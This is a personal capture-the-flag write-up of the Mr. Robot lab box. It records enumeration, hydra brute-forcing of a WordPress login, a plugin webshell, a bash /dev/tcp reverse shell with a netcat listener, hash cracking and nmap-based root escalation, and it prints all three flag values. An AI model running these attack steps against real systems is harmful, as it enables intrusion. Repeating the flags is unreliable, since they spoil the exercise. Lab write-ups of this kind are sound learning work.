---
title: Vulnhub/TryHackMe Mr. Robot
date: 2022-06-24 12:00:00 -0700
categories: [ctf,tryhackme]
tags: [thm,hacking,cybersecurity,ctf,writeup] # TAG names should always be lowercase
---

# Mr. Robot - vulnhub
---

## Flag 1
---
As always I start with nmap and gobuster.
```bash
nmap -sC -sV -oN nmap/initial $IP

gobuster dir -u http://$IP -w wordlist.txt -x .cgi,.txt,.php,.html,.py,.sh,.jpg,.png -t 200
```
by enumerating the website and going to 
```html
http://<box ip>/robot.
```
it shows that their is a file 
called 'key-1-of-3.txt'. if you browse to it
you will be given the first flag

073403c8a58a1f80d943455fb30724b9


## Flag 2
---
This one was complicated for me.
So after finding the first flag in /robots their was also a file called fsocity.dic. 
I pulled that file with curl and then sorted it out with sort and filtered it down using uniq to bring down the amount of repeats in the dictionary.
```bash
curl -o fsocity.dic http://$IP/fsocity.dic
```
```bash
sort fsocity.dic | uniq
```
You can also just do 
```bash
sort -u fsocity.dic
```
I then went to the /wp-login found when enumerating and used hydra to enumerate the logon process with the username being elliot.
```bash
hydra -l elliot -P wordlist.txt $IP
```
I found the username by guesswork but could be found with hydra as well using the fsocity.dic that we sorted out. 

After finding the password for the account elliot, we see that it is an admin account. Ngl I was stumped for a minute trying to find out how to exploit wordpress. 
I went down multiple rabbit holes like : 
exploiting xmlrpc.php, or trying LFI's and other related CVE's. 
I then conceited and peeked at a writeup and saw a few different ways people progressed. 
Trying to get a hold of a shell was a pain. Some of the methods just did not work. I tried adding a php reverse shell via templates. both making my own and editing the 404 template didn't work. then I ultimately found out I can use a plugin to access a webshell (which I now learned is very tedious to use. might make a tool to interface with it:) 
After gaining access through the plugin and navigating to it. I learned I can move throughout directories and that i can execute commands.
I used a bash reverse shell and caught it with netcat. 
```bash
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
nc -lnvvp 8080
```
I then searched for different files and saw the flag. however I could not read it. I would need to be a different user to access it. 
In the same directory as the flag was a password that was an md5 hash of the password of a user robot. 
I cracked the hash using john the ripper and tried to log in as the robot user, however I needed to be in an actual terminal so I stabilized the shell with python
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
```
and logged in as robot. then I read the flag file.

822c73956184f694993bede3eb39f959


## Flag 3
---
Now that we have access to the system lets try and escalate to root.

To do so lets enumerate the system. 
Now i did this by hand butIi also could have imported linpeas or linenum to do this for me. I tried: 
```bash
sudo -l
ps aux
find / -perm 4000 -exec root
```
nothing, I then started researching and noticed others add a "w" to the ps aux I did before.
So I tried it and saw a few processes running and noticed nmap. I then went to gtfobins and tried --interactive and !su. IM ROOT!!! Now I navigated to /root and saw the 3rd flag. cat it out and bam. 

04787ddef27c3dee1ee161b21670b4e4


and so concludes the mr robot ctf from vulnhub! I had done this before I knew it was also ported to TryHackMe and it was the same for their too




